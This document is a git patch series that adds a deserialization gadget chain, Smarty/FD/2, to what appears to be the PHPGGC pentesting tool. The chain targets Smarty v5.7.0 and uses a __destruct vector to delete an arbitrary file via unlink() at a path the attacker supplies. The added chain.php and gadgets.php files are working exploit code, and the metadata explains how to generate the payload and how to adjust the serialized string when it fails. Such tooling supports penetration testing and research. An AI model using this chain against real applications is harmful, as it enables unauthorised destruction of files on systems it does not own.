From 669223c2cbd336b130e46bdac2742fac516e2433 Mon Sep 17 00:00:00 2001 From: Reuben Seah <108401257+quirmz@users.noreply.github.com> Date: Thu, 5 Feb 2026 15:27:53 +0800 Subject: [PATCH 1/3] Add Smarty/FD/2/chain.php --- gadgetchains/Smarty/FD/2/chain.php | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 gadgetchains/Smarty/FD/2/chain.php diff --git a/gadgetchains/Smarty/FD/2/chain.php b/gadgetchains/Smarty/FD/2/chain.php new file mode 100644 index 00000000..2ead1135 --- /dev/null +++ b/gadgetchains/Smarty/FD/2/chain.php @@ -0,0 +1,21 @@ +\', replace it with a simple serialized string like \'s:1:"b"\' and try using the modified payload.'; + public static $parameters = [ + 'remote_path' + ]; + + public function generate(array $parameters) + { + return new \Smarty\Template($parameters['remote_path']); + } +} + +?> From 6792130365065b369173efdf02a994e6d54203db Mon Sep 17 00:00:00 2001 From: Reuben Seah <108401257+quirmz@users.noreply.github.com> Date: Thu, 5 Feb 2026 15:28:44 +0800 Subject: [PATCH 2/3] Add Smarty/FD/2/gadgets.php --- gadgetchains/Smarty/FD/2/gadgets.php | 66 ++++++++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 gadgetchains/Smarty/FD/2/gadgets.php diff --git a/gadgetchains/Smarty/FD/2/gadgets.php b/gadgetchains/Smarty/FD/2/gadgets.php new file mode 100644 index 00000000..7cfe17f3 --- /dev/null +++ b/gadgetchains/Smarty/FD/2/gadgets.php @@ -0,0 +1,66 @@ +smarty = new Smarty(); + $this->smarty->cache_locking = true; + $this->getCached($lock_id); + } + + public function getCached($lock_id) { + $this->source = new \Smarty\Template\Source(); + $this->cached = new \Smarty\Template\Cached(); + $this->cached->source = $this->source; + $this->cached->handler = new \Smarty\Cacheresource\File(); + $this->cached->lock_id = $lock_id; + $this->cached->is_locked = true; + } + } +} + +?> From d498d66aa74d58eb6094e34d8c1eadb7ad1d3599 Mon Sep 17 00:00:00 2001 From: Reuben Seah <108401257+quirmz@users.noreply.github.com> Date: Thu, 5 Feb 2026 17:55:14 +0800 Subject: [PATCH 3/3] Edit information --- gadgetchains/Smarty/FD/2/chain.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gadgetchains/Smarty/FD/2/chain.php b/gadgetchains/Smarty/FD/2/chain.php index 2ead1135..66cf1421 100644 --- a/gadgetchains/Smarty/FD/2/chain.php +++ b/gadgetchains/Smarty/FD/2/chain.php @@ -7,7 +7,7 @@ class FD2 extends \PHPGGC\GadgetChain\FileDelete public static $version = 'v5.7.0'; public static $vector = '__destruct'; public static $author = 'quirmz'; - public static $information = 'Updated version of Smarty/FD/1 that deletes a file. Generate gadget with \'-a\' flag. If the payload does not work, manually remove \'r:\', replace it with a simple serialized string like \'s:1:"b"\' and try using the modified payload.'; + public static $information = 'Updated version of Smarty/FD/1 that deletes a file via \'unlink()\'. Generate gadget with the \'-a\' or \'-pub\' flag. If the payload does not work, manually remove \'r:\', replace it with a simple serialized string like \'s:1:"b"\' and try using the modified payload.'; public static $parameters = [ 'remote_path' ];